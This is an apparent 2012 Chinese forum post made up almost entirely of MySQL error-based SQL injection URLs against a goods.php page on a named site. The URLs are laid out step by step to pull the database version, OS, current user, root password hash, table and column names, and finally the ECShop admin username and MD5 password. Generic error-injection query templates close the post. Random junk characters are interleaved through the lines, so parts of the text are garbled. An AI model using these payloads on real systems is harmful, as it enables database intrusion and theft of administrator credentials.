判断版本号 3 q' O) }$ Y ]2 u6 \6 \4 C1 \
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, w+ ^' P$ E+ f+ i8 t# M
8 c0 _; J! |/ K# {6 B4 b7 i判断系统
6 i& c" V9 T9 Q* C! L l3 r
3 P' b6 k4 h- Chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! D8 @, m8 y6 ]. D
$ h. ?9 [3 U4 P; j8 \
$ j) `5 b" x! P9 Q
/ _' m* u0 \1 c: z
当前 user()
o6 X$ \ u9 B# p& S) R7 U4 I; o: B n; A) W# E6 B
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
r1 z, W+ T. ]$ J9 z; _
7 X3 |( @5 N3 A. S9 M: ?1 E5 V) n# s+ y3 ]8 r
$ n, g0 e& }$ v6 f8 J0 g当前 database()) y5 S% Q5 c; u6 Y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 S6 O) z0 w' E' T7 [+ p! |' M8 \2 k) @5 D3 G, _6 p% {3 ], k
7 h; X, f& R0 l* \3 K' X
' O% }9 {& H7 [9 r$ ~8 Y* s- q
2 p! F, H/ O! ]; n! F6 E% hroot hash
* m; \0 K! E! @' N& d5 ]) L) [' ?* B2 ^
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ w u, H& p3 J' Z: ^
3 u3 \3 ~% V: `( X @, \$ t! E# U# I Z, K/ R! a+ N! s8 f- {- l
- t2 j/ i! d( j( I$ q当前 数据库表名
/ T7 m: Y# u& Q+ _1 ?% U( f1 Z. x y3 L7 u- ?* B
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, {/ h& S$ w, R. `% B
$ S! T% o; ], M; o, C# Z: E( C
+ r- e% k; P$ ` x" J% ?* b7 C$ @
# {* S" p: t0 k) @! Q0 _当前 数据库 user_name 字段( I: [! v: j3 ?1 N/ g
! \9 V4 T) M) }1 ?9 T0 ^0 chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& y7 V6 D! _3 z Y) d% a0 U7 ^
$ U6 a! n. h0 r当前 数据库 字段 password
r) N: H. D9 q, F: y( ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 |. L/ S- } |4 t6 c
7 U7 G8 A5 L6 Z2 h& ~
0 Z) ^' O5 B! o$ e4 r% F3 Q& {1 `8 |2 e) d' l* U9 v
获得 admin passwd(md5)- M& h U( u% d$ h
; ~9 y P! X! a; n/ w* h. l) h1 T' f/ c8 m0 X/ Y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! o" a- u4 [0 {9 _+ M
, c, Q9 T$ p4 M, P" e
报错注射
; ~; @; Z! s7 Q: ~, ISELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)+ P6 A" D% @4 }; \& G; t
" L/ q1 {1 j2 O( t# ~! |
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
, e7 c% n' f0 Y6 F T
# c, e5 B% b: v ~9 _$ Tand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |
发表于 2012-9-5 14:59:30
收藏
支持
反对